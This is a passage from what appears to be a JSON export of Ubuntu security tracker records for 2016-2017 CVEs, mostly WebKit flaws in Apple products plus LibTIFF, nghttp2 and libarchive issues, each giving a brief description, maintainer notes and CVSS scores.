site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2395", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2395"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2395", "href": "https://ubuntu.com/security/CVE-2017-2395", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:11", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2476", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2476"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2476", "href": "https://ubuntu.com/security/CVE-2017-2476", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:12", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2468", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2468"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2468", "href": "https://ubuntu.com/security/CVE-2017-2468", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:08:38", "description": "The DumpModeEncode function in tif_dumpmode.c in the bmp2tiff tool in\nLibTIFF 4.0.6 and earlier, when the \"-c none\" option is used, allows remote\nattackers to cause a denial of service (buffer over-read) via a crafted BMP\nimage.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=820362>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | out of bounds read \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | upstream removed the bmp2tiff utility in 4.0.7 we will not be fixing this minor issue, marking as ignored\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-10-03T00:00:00", "type": "ubuntucve", "title": "CVE-2016-3619", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619"], "modified": "2016-10-03T00:00:00", "id": "UB:CVE-2016-3619", "href": "https://ubuntu.com/security/CVE-2016-3619", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:03:10", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is\naffected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is\naffected. The issue involves the \"WebKit\" component. It allows remote\nattackers to bypass the Same Origin Policy and obtain sensitive information\nvia a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2480", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2480"], "modified": "2017-04-02T00:00:00", "id": "UB:CVE-2017-2480", "href": "https://ubuntu.com/security/CVE-2017-2480", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:03:11", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nconduct Universal XSS (UXSS) attacks via crafted use of frames on a web\nsite.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2475", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2475"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2475", "href": "https://ubuntu.com/security/CVE-2017-2475", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:03:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2394", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2394"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2394", "href": "https://ubuntu.com/security/CVE-2017-2394", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:09", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected.\nwatchOS before 3.2 is affected. The issue involves nghttp2 before 1.17.0 in\nthe \"HTTPProtocol\" component. It allows remote HTTP/2 servers to have an\nunspecified impact via unknown vectors.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | no details, likely apple-specific CVE, marking as not-affected\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-02T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2428", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2428"], "modified": "2017-04-02T00:00:00", "id": "UB:CVE-2017-2428", "href": "https://ubuntu.com/security/CVE-2017-2428", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:16", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted web\nsite.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2367", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2367"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2367", "href": "https://ubuntu.com/security/CVE-2017-2367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:03:13", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2454", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2454"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2454", "href": "https://ubuntu.com/security/CVE-2017-2454", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:13", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2460", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2460"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2460", "href": "https://ubuntu.com/security/CVE-2017-2460", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:10", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is\naffected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is\naffected. The issue involves the \"WebKit\" component. It allows remote\nattackers to bypass the Same Origin Policy and obtain sensitive information\nvia a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2479", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479"], "modified": "2017-04-02T00:00:00", "id": "UB:CVE-2017-2479", "href": "https://ubuntu.com/security/CVE-2017-2479", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:03:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2466", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2466"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2466", "href": "https://ubuntu.com/security/CVE-2017-2466", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:11", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2481", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2481"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2481", "href": "https://ubuntu.com/security/CVE-2017-2481", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:12", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2470", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2470"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2470", "href": "https://ubuntu.com/security/CVE-2017-2470", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:10", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected.\nwatchOS before 3.2 is affected. The issue involves symlink mishandling in\nthe \"libarchive\" component. It allows local users to change arbitrary\ndirectory permissions via unspecified vectors.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | possibly apple-specific, no details marking as not-affected due to lack of details as of 2018-03-27\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-02T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2390", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", 